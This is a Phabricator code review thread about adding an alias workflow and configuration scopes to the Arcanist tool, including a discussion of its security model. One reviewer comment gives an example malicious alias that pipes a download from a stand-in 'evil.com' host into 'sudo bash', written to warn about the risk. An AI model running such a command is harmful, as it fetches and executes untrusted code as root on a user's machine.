Page MenuHomePhabricator

[Wilds] Continue toward a generalized "arc alias" workflow
ClosedPublic

Authored by epriestley on Sep 20 2018, 6:27 PM.
Tags
None
Referenced Files
F13044215: D19697.diff
Wed, Apr 17, 3:11 PM
Unknown Object (File)
Sat, Apr 13, 4:59 PM
Unknown Object (File)
Sat, Apr 13, 4:59 PM
Unknown Object (File)
Sat, Apr 13, 6:50 AM
Unknown Object (File)
Sat, Apr 13, 6:50 AM
Unknown Object (File)
Thu, Apr 11, 7:20 AM
Unknown Object (File)
Sat, Apr 6, 4:47 AM
Unknown Object (File)
Sat, Mar 30, 6:48 AM
Subscribers
None

Details

Summary

Ref T13098. This leaves a lot of rough edges but nothing is overtly broken so here's where we're at so far:

Config sources get "scopes", like user configuration vs system configuration. The major reason for this is so that arc set-config x y can know where it's supposed to write. This is generalized enough that we can implement arc set-config --system ... and arc alias --local ... and so on relatively easily later, although scopes themselves are not modular (a third-party can't add a new type of config scope). Maybe we'll modularize this some day but it felt like that's probably YAGNI/overboard since we have no current use cases. For now, a source does not need to belong to any particular scope.

Config may be writable (like user config in ~/.arcrc) or nonwritable (like --config flags). Writable config can now specify how to write to disk. Config files can actually write to disk now, although the only pathway for doing this that exists is via arc alias.

Aliases now parse properly and can write to disk. arc alias now lets you define aliases, and writes them to disk. The first time you do this, your ~/.arcrc file will be rewritten into a format which old arc can not read! It's relatively easily to unmangle/repair these files so I'm planning to just let this happen.

When a toolset is invoked, it now reads and evaluates aliases. Aliases have a lot of new guard rails like suggesting the user try arc draft if they type phage draft, allowing alias chains, detecting cycles, and limiting chain length.

Workflows can provide help and argument lists in a more structured way. I've moved this to sub-objects: help is now on WorkflowInformation (instead of a bunch of different getHelp(), getSynopsis() methods) and arguments now have a WorkflowArgument object instead of a dictionary. I think this pattern is generally better for extending: it lets us add and change stuff with less impact (and greater explicitness) down the road.

arc alias now has reasonable help text and argument documentation. The arc alias (list) and arc alias x (details/remove) flows don't work yet but arc alias x y does.

arc liberate now uses the new help/argument stuff, although the help needs more beef eventually. I pruned a bunch of long-obsolete or questionable flags and renamed --all to --clean since --all sounds like "liberate all libraries", which is now the default behavior of arc liberate.

Test Plan

You can now define chains of aliases. Finally!

$ arc draft4
 WARNING  Ignoring unrecognized configuration option ("hosts") from source: User Config File (/Users/epriestley/.arcrc).
 WARNING  Ignoring unrecognized configuration option ("load") from source: Project Config File (/Users/epriestley/dev/core/.arcconfig).
 ALIAS  arc draft4 -> arc draft3
 ALIAS  arc draft3 -> arc draft2
 ALIAS  arc draft2 -> arc diff
Usage Exception: Unrecognized argument '--draft'.

This also works now:

$ phage alias deploy-secure -- deploy --hosts secure001-4 --limit 1

General!

Diff Detail

Repository
rARC Arcanist
Lint
Lint Not Applicable
Unit
Tests Not Applicable

Event Timeline

epriestley created this revision.

I've been trying to review this all week but my eyes keep crossing. Sitting down to get through the rest of it now!

This also works now:
$ phage alias deploy-secure -- deploy --hosts secure001-4 --limit 1

Sweet!! Definitely check some of these into the repo.

This generally looks good, but I would really like to see some unit tests around aliases overriding existing toolset commands, cycle detection, alias chaining, and the upgrading of old-style alias definitions since none of that code was obviously-correct enough for me to feel comfortable about something that could be an attack vector/opportunity for data loss.

src/config/ArcanistConfigurationSourceList.php
61–67

When could this happen?

src/toolset/ArcanistAlias.php
39

Kinda surprised that this isn't a libphutil function. I had to think about this for a minute.

src/toolset/ArcanistAliasEngine.php
50

This method could definitely use some unit tests. I'm pretty reluctant to approve this without them.

91

Moar tests plz.

src/toolset/ArcanistWorkflow.php
75

Is this so fancy because you're trying to avoid removing trailing or leading newlines? Why not implode(" ", explode("\n", $help)); or preg_replace("/\n/", " ", $help);?

75

Also, I now want tooling that automatically generates inline regexr links for arguments passed to preg_replace.

77

I guess this is just a style thing, but I definitely would have put this^^ logic inside setHelp(). I've seen you use this pattern in a lot of other places; any particular reason?

src/toolset/workflow/ArcanistAliasWorkflow.php
20–27

"shorthands"

20–27

Also I'd say "frequently-used commands" or "commonly-used" commands.

44–58

$ arc alias <existing_alias_name> or similar.

50–56

Why, @epriestley. Why do you do this.

(I don't know if arc already has any arbitrary command execution abilities, but this makes it possible for a rogue developer to do something like:

arc alias doff '!curl http://evil.com | sudo bash; arc diff'

or similar, which is not great).

61

"toolset's binary"

72–73

I would rephrase as "A newly-added toolset which conflicts with an older alias will take precedence over the alias."

124

//TODO

124–125

Add a //TODO here?

support/ArcanistRuntime.php
479–485

Did this bleed over from the log cleanup diff?

This revision now requires changes to proceed.Sep 22 2018, 1:26 AM
epriestley marked 6 inline comments as done.

This generally looks good, but I would really like to see some unit tests around aliases overriding existing toolset commands

I'm substantially in agreement. My thinking here is:

  • I wrote the code to be relatively testable so that these tests should be reasonable to write later: we emit a list of Effect objects that unit tests should have an easy time verifying; but
  • when run, arc unit crashes immediately, and probably won't run for like a whole lot more diffs.

So I'm not sure how to realistically test this today. I tentatively expect to do a cleanup pass over each workflow later, to do this stuff:

  • test on Windows;
  • test on all of Git/SVN/Mercurial, if applicable;
  • add test coverage;
  • fill in "arc guide" if that gets built and is applicable;
  • rewrite the documentation, if applicable;
  • double check the old code vs the new code and try to catch any pieces/behavioral changes which got dropped on the floor or aren't noted in the changelog.

Upshot: unless you have a better idea, can I give you an IOU for test coverage on T13098 until arc unit runs again?

(arc unit might be a good workflow to make work soon, but I'm planning to do: Windows, signal handling, and prompts first since they're shared across all toolsets/workflows.)

I'll also do a code pass to update for the rest of the inlines, at least.

src/config/ArcanistConfigurationSourceList.php
61–67

Today, it can't.

You can have multiple sources of the same type with --config-file x --config-file y, but they won't be writable.

Soon, you can have multiple writable sources (user, local) but they won't have the same scope.

So this is mostly just future-proofing. I think the two most likely ways to get here in the future are:

  • ConfigEngineExtension gets more ability to muck with config, and you write one which injects a second User config source or something;
  • we add arc --config-file Q set-config --file ... or something (use case: build a standalone config file for a bot without editing JSON), and then you run arc --config-file Q --config-file R set-config --file x y. I don't really plan to do this, but I think it's not outside the realm of imagination.
src/toolset/ArcanistAlias.php
39

It probably should be, I bet we've got at least a few callsites by now and the construction isn't obvious to look at. Got any good name ideas? phutil_array_has_natural_keys()? phutil_is_deserialized_json_list_not_object()?

src/toolset/ArcanistWorkflow.php
75

The "help" is a big block of text like this:

Blah blah blah blah blah blah
blah blah blah blah blah.

**Helpful Heading**

Blah blah this command:

  $ blah blah blah

Blah blah blah blah

I want to remove only one newline from this example, "unwrapping" this line while retaining all the formatting newlines:

Blah blah blah blah blah blah  <<< Remove This Newline Only
blah blah blah blah blah.      
                               
**Helpful Heading**

Blah blah this command:

  $ blah blah blah

Blah blah blah blah

With the implode/explode or preg_replace approaches, we'd get rid of all the newlines.

The "clever regexp" approach only removes newlines surrounded on either side by non-whitespace, so only "unwrappable" lines. This isn't great.

A better solution might be to put the help in separate text files or something, but some of it currently takes a lot of "%s" parameters. That also makes it more difficult to translate.

I'm not really super happy about this piece of code but I'm not sure how we can do better without adding a lot of weirdness.

We could also disable the separate wrapping inside the Phutil part of help-printing, and maybe that's cleaner. However, it means we can't indent/wrap this block into a format other than the written-in-PHP format. I'm not sure if I want to or not.

I'm inclined to just note this and revisit it later?

77

I generally think this should be true:

$x = <some value>;
$object->setThing($x);
$y = $object->getThing();
assert($y === $x);

That is, if you setThing() and then getThing(), you should (usually, probably, almost) always get exactly the same thing back.

This isn't good for any particular "legal" reason, but if getThing or setThing include a hidden mutation, I think it tends to lead to code that violates expectations in some subtle way sooner or later. Even in the best case where no one makes a mistake, sometimes you discover you actually need the raw value. Then you're in trouble if you can't rename getThing() safely, since you have to add a getThingRawValue().

A different soft rule I try to follow that I can't really put my finger on a concise explanation of is something like "kind of preserve raw inputs for a long time unless there's a pretty good reason not to or this rule conflicts with a better rule?". Not much of a rule. But when something goes wrong, it's often easier to debug if the error can say "we started with input X and a bad thing happened" than if it it has to say "we started with some input, and then mutated it, and then ended up with Y, and then a bad thing happened". If you know "input X" made a bad thing happen, you can usually go put "$input = X" in the code somewhere and reproduce instantly. If you only know that mystery input X which can be mutated into Y makes bad things happen, you sometimes have to walk up the stack a step at a time before the thing reproduces.

I did consider putting this logic inside WorkflowInformation as a method like getUnwrappedHelpForDisplay() instead of here in Workflow, and that's the approach I usually prefer (that is, getX() and getXHeyBuddyThisMethodMutatesThings() feel preferable to getX() and getRawX() to me) but that class is pretty clean and this class is a big mess so I just threw it on the pile here instead.

Broadly, yes, this block is sketchy and at least merits a revisit later.

src/toolset/workflow/ArcanistAliasWorkflow.php
50–56

This is an existing capability and I'm not making things worse, at least.

Today, the permissions model is that arc is allowed to run as much arbitrary code as it wants without asking you.

We could consider changing this -- if we want to, now is the right time. However, I think it may be very difficult.

Consider this:

$ git clone evil_project
$ cd evil_project
$ arc unit

At least if you think about it, this can "obviously" own your machine, right? It necessarily runs arbitrary code in the evil project, and there's no guarantee that something an evil project claims is a unit test isn't just a rootkit.

And arc diff runs arc unit, so that can root you too.

Currently, running any arc command at all in an evil project can compromise your machine, because .arcconfig may load a library/extension, and that library/extension can run arbitrary code. The evil code can be self-contained in the project so it's trivial to build an attack repository which activates when you do this:

$ git clone evil_project
$ cd evil_project
$ arc help

I think this isn't really so different from this, which can also attack you:

$ git clone evil_project
$ cd evil_project
$ ./configure

...but users sort of expect that ./somebinary is more "powerful" than somebinary.

Also, because "git" and "hg" and "svn" generally are safe to run in an evil repository (bugs notwithstanding), users can transfer that expectation to arc (which "feels" like a VCS command), even though they don't have that expectation about make (which does not have the same "feeling").

We could do something like: the first time you run arc in a repository with an unrecognized origin remote URI, if stdout is a TTY, we could prompt you:

"arc" can run arbitrary code from repositories without prompting you. Running "arc" in a working copy has a security model like "make", not like "git". You should not run "arc" commands in an untrusted repository, similar to how you wouldn't run build commands in an untrusted repository.

Continue only if you trust that the code in this repository is not malicious.

Trust this repository (remote.com/path/to/repository.git)? [y/N]

I'm not sure that's good on the balance.

I do think this could use more treatment in the documentation at a minimum.

support/ArcanistRuntime.php
479–485

This gets cleaned up in that diff (which happens later). In this diff, it just moved up, but the diff algorithm kind of highlighted it weird since the code sort of changed from "AliasStuff, LogTrace" to "LogTrace, AliasStuff2".

On the shell stuff, I also think the feature is pretty dumb and wouldn't entirely mind removing it, although I don't think it's bad or dangerous or silly enough to feel strongly about getting rid of.

I think the arguments for it are:

It doesn't actually change the security model; "arc" is dangerous to run in an untrusted working copy whether "arc duff" can own your machine or not.

Some users aren't very familiar with shell features. The entire "arc alias" feature itself is fairly questionable: every shell has alias support, and it's very easy to write a bash alias. But, especially historically, we've received a fair number of support requests where the answer seems like it should be "write a shell alias" to me, e.g. "how do I make --some-flag the default behavior for arc <whatever>?". If you know how to write a Bash alias, you probably just write one instead of asking that question. The existence of "arc alias" turns the answer from "here's how shells work" into "run arc alias whatever2 -- whatever --some-flag". Likewise, the shell mode allows a support answer which does what the user wants even if they don't understand what's going on because they don't know how to combine shell commands with "&&", or don't know how to select arguments with "$3", or don't know how to pipe output, or don't understand how "--" works, or whatever else.

For a long part of the lifetime of this project, I tried to reduce the cost of unpaid support by making support questions easier to answer, under the theory that unpaid support could perhaps be made more scalable if I could more often provide a quick answer ("run this command") instead of a detailed one ("here's a good resource on shell features"). From my point of view, this didn't work: I never figured out how to make users read the documentation, understand what "describe your problem, not just the solution you want" meant, etc, so I could never turn enough questions into one-liner answers to make support feel rewarding. I'm less concerned about changes which serve this goal ("make unpaid support easy") now than I was in the past, since unpaid users are now exiled to Discourse.

Because aliases can be defined in project/.arcconfig, there is some value in duplicating shell features, since you can distribute and version those aliases more easily than normal shell aliases.

Finally, behold this marvel:

https://github.com/robbyrussell/oh-my-zsh/blob/master/plugins/arcanist/arcanist.plugin.zsh

Software development is primarily limited by typing speed, which is why software interviews mostly just consist of a typing test.

Upshot: unless you have a better idea, can I give you an IOU for test coverage on T13098 until arc unit runs again?

Maybe just write some of the tests now while the code is fresh in your mind? IMO, the biggest advantage of TDD is not doing a complete context switch until you've gotten the testing ideas written down. Either way I take your point about arc unit being a ways away from resurrecting and I'm letting this go forward for now.

(arc unit might be a good workflow to make work soon,

Yeah, I'd be inclined to prioritize that, but you've got your head in the code so I'm happy to defer to your plans.

On the shell stuff, I also think the feature is pretty dumb and wouldn't entirely mind removing it,

Thanks for the writeup; I understand the reasoning better now. From this diff it looked like you were just getting down to the business of implementing it, which gave me multiplying chills.

src/toolset/ArcanistAlias.php
39

phutil_is_like_a_regular_non_php_array_thing?

src/toolset/ArcanistWorkflow.php
75

I would have assumed that <<EOF-style strings were the way to go, but I can also see this^^ being less work than converting a bunch of existing multi-line string concatenation.

77

This was really interesting; thanks for the write up!

src/toolset/workflow/ArcanistAliasWorkflow.php
50–56

We could do something like: the first time you run arc in a repository with an unrecognized origin remote URI, if stdout is a TTY, we could prompt you:

I think this is one of those things that sounds like it's doing users a favor, but 99% of people would click through it without reading, and the last 1% would demand a complete audit of rARC before putting up with these silly new tools any longer.

Agreed that a blurb in the docs would be helpful.

epriestley added inline comments.
src/toolset/ArcanistWorkflow.php
75

The workflows are using <<<EOF strings, but newlines are respected in them -- and they're currently written with newlines since they're in code and lint will complain later if they aren't wrapped to 80 columns.

  • Wordsmithing and typo fixes.
  • Mark the incomplete parts with "// TOOLSETS" comments.
  • Tests coming soon!
  • I'll make notes about phutil_is_natural_list() and the unwrapping junk on T13098.
This revision is now accepted and ready to land.Sep 25 2018, 10:53 PM

To this general point:

Maybe just write some of the tests now while the code is fresh in your mind?

This code still needs a lot of revisiting (list / delete don't work/exist yet, no way to write aliases to non-user config sources, there's no actual implementation for executing shell command aliases, the UI is pretty rough) so I can't forget about it just yet. It also looks like arc unit isn't too far off -- I at least have it running, sort of, a few diffs down the road.

This revision was automatically updated to reflect the committed changes.